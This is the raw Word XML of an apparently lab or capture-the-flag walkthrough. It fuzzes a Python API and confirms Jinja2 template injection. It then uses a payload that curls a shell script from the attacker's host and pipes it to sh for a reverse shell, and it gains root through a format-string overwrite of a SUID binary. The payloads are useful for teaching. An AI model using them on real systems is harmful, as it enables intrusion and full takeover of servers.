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RAW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46sn8hv16uo7"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41600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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4"/>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0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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5000 - HTTP</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take a look at this Python application running on port 5000:</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68600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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port 5000 in the browser, we notice that it is an API and it requires a token. We can perform fuzzing to find possible relevant files or directories. For this, I will use the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tool:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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ffuf -u http://172.31.23.94:5000/FUZZ -w raft-large-directories-lowercase.txt -c -t 100</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brute-forcing directories in the application, we found the following routes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">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register</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login</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">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users</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14700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/register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route, it returns a message saying that the request method type is not allowed.</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06700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74"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intercept this request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Changing the method type to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we receive a different output.</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6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other words, the application is now requesting certain parameters to register:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">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email</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name</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password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">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username</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pass these parameters in JSON format in the request body.</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90700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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we are able to register. We can log into the application by sending a request to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/login</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> route.</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6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for that, we need to generate our token:</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-X POST http://machine-ip:5000/login -H "Content-Type: application/json" --user "user:password"</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6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generating the token, we can use it by passing it in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">token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on the main route.</w:t>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6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notice that the value of the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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> field was displayed to us. From this point, we can test some vulnerabilities, one of them being </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSTI (Server-Side Template Injection)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WSTG - v4.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">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Web applications commonly use server-side templating technologies (Jinja2, Twig, FreeMarker, etc.) to generate dynamic HTML responses. Server-Side Template Injection vulnerabilities (SSTI) occur when user input is embedded in a template in an unsafe manner and results in remote code execution on the server.</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hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection</w:t>
        </w:r>
      </w:hyperlink>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create a new user this time with a different username. The value of the field will be </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{{7*7}}, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it returns </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">49</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it indicates that it is vulnerable to this type of attack.</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52700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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2006600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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see that it returned 49, which confirms that it is vulnerable to SSTI.</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5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this API is built in Python, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jinja2 payloads</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to obtain a reverse shell:</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PayloadsAllTheThings/Server Side Template Injection</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{{ namespace.__init__.__globals__.os.popen('curl &lt;IP-VPN&gt;/shell.sh | sh ').read() }}</w:t>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Content of the payload file</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79600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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Creating a new malicious user.</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52700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Obtaining the token.</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22400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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passing the new token, we receive the shell.</w:t>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7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r1gcr9bq4rpn" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1854200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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pr94u7jaq6it" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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a reverse shell on the host, we notice that there is a directory → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FuncS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and inside this directory there is a binary with the SUID bit set and owned by root → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fmt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7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execute this binary.</w:t>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22400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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executing the binary, we notice that it asks to change the value of the variable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(secret)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to 862.</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C format specifiers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hyperlink r:id="rId29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.freecodecamp.org/portuguese/news/especificadores-de-formatacao-em-c/</w:t>
        </w:r>
      </w:hyperlink>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need to discover at which position the variable starts, using a sequence of characters with the letter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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> whose hexadecimal ASCII value is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0x41</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./fmt AAAA.%x.%x.%x.%x.%x.%x.%x.%x.%x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">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b2zsr8yazeb6" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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425700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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5"/>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%x</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → To display a number in hexadecimal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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AAAA</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 To complete 32 bits</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At the 9th position, the variable begins. We can access this variable within the stack using:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./fmt AAAA.%9\$x</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bekmci8u1e0" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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133600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="77"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s5l07ps0c1mp" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We see that it returned</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 41414141</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is the hexadecimal value of "A".</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know the memory address of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">secret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variable, we can overwrite its value:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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5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Python to create our payload:</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./fmt $(python2.7 -c 'print "\x78\xda\xff\xff" + "%858x" + "%9$n" ')</w:t>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it, we obtain a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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0xffffda78</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → We convert the address of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">secret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variable to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Little Endian</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (reverse byte order).</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%858x</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Value that will overwrite the variable plus 4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Finally, the position where the values will be overwritten, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to write the values into the variable.</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execution, we successfully obtain the root shell.</w:t>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75"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headerReference r:id="rId34" w:type="default"/>
      <w:headerReference r:id="rId35" w:type="first"/>
      <w:headerReference r:id="rId36" w:type="even"/>
      <w:footerReference r:id="rId37" w:type="default"/>
      <w:footerReference r:id="rId38" w:type="first"/>
      <w:footerReference r:id="rId39"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E">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2" name="image24.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image24.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F">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0">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8" name="image12.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image12.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RAW</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6.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.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6.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.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freecodecamp.org/portuguese/news/especificadores-de-formatacao-em-c/" TargetMode="Externa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1.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId38" 